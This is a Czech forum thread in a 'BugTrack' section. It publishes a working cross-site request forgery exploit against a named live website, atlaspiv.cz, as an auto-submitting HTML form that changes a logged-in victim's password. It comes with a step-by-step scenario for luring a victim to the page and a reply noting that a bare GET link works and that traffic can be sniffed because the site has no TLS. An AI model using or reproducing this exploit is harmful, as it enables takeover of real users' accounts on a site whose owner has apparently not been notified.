Auth CSRF (pass change) -> atlaspiv.cz

BugTrack

Auth CSRF (pass change) -> atlaspiv.cz#
Vytvořil jsem test účet. (hello_security)

Změna hesla přes GET metodu? Proč ne:D To, že session nespadne, když si to heslo změníte, komentovat ani nebudu. Stránka je pořád aktivní.

code:
<html>
<body>
<form method="GET" action="[link]">
<input type="hidden" name="element_id" value="tab_result"/>
<input type="hidden" name="function_class" value="user"/>
<input type="hidden" name="function_name" value="pages_action"/>
<input type="hidden" name="light" value="1"/>
<input type="hidden" name="params" value="page%3Duser_admin%23%23action%3Dchan
ge_pass%23%23passw1%3Dpicus12345%23%23passw
2%3Dpicus12345%23%23action%3Dchange_pass%23
%23tab%3D%23%23submit%3DZm%25C4%259Bnit%252
0heslo"/>
<input type="submit" value="Submit">
</form>
<script>document.forms[0].submit();&l
t;/script>
</body>
</html>

Jelikož stránka nemá žádnou CSRF protekci, je to úplně triviální. Pokud chcete změnít heslo z "picus12345" na něco jiného, prostě přepište všechny 4 parametry, kde se to heslo vyskytuje. (passw1 2x; passw2 2x)



Možná se někdo z vás bude ptát na ten script, proč tam je?
Aby victim nemusel na nic klikat. Forma se automaticky pošle, když danou stránku navštíví.

Scenario would be like :
1) Máš stránku s tímto exploitem a chceš zničit svého "přítele", protože ti vypil pivo.
2) Pošleš mu stránku s tím, že tam na něj čeká sud piva zdarma.
3) Klikne na to, změna hesla proběhne.
4) Ty máš ez profit (máš heslo vole!)


CSRF resources: [link]
-> ano, opět portswigger academy, protože ten je na websec nejlepší... a search egine.

Cheers. :)


(odpovědět)
NordVPN enjoyer | 212.83.182.*19.10.2022 13:56
re: Auth CSRF (pass change) -> atlaspiv.cz#
A pokud používáte selský rozum, budete vědět, že tenhle code je celej zbytečnej.. proč?

Protože to jde přes GET parameter, čili jediný, co stačí, je poslat tento link nějakýmu štamgastoj, on na to klikne (heslo se změní na heslo, které jste tam zadali) a ez profit.

[link]

A ano, stránka nepoužívá TLS, takže sniffování zdar!

Výborná stránka.

Cheers. :)



(odpovědět)
NordVPN enjoyer | 212.83.182.*19.10.2022 14:04
re: Auth CSRF (pass change) -> atlaspiv.cz#
V čem je to profit na naprosto bezvýznamném webu kromě pohonění ega?
(odpovědět)
wtf? | 188.175.92.*30.10.2022 18:17
re: Auth CSRF (pass change) -> atlaspiv.cz#
Nevím, jestli jsi fakt tak stupidní, nebo to jen hraješ. Sekce BugTrack slouží k tomu, abys sdílel zranitelnosti s ostatníma, nezáležíc na tom, jaký web to je. O profit mi vůbec nejde, kdybych chtěl profitovat, asi to nesdílim na soomu šašku a rozhodně netargetuju tyhle stránky, prostě to jen tak z prdel sdílím sem a hotovo + ještě něco lidi naučím.

Kdybych si chtěl pohonit ego, ten příspěvek vypadá úplně jinak.

Dík.


(odpovědět)
NordVPN enjoyer | 212.83.182.*3.11.2022 15:33

Zpět
 
 
 

 
BBCode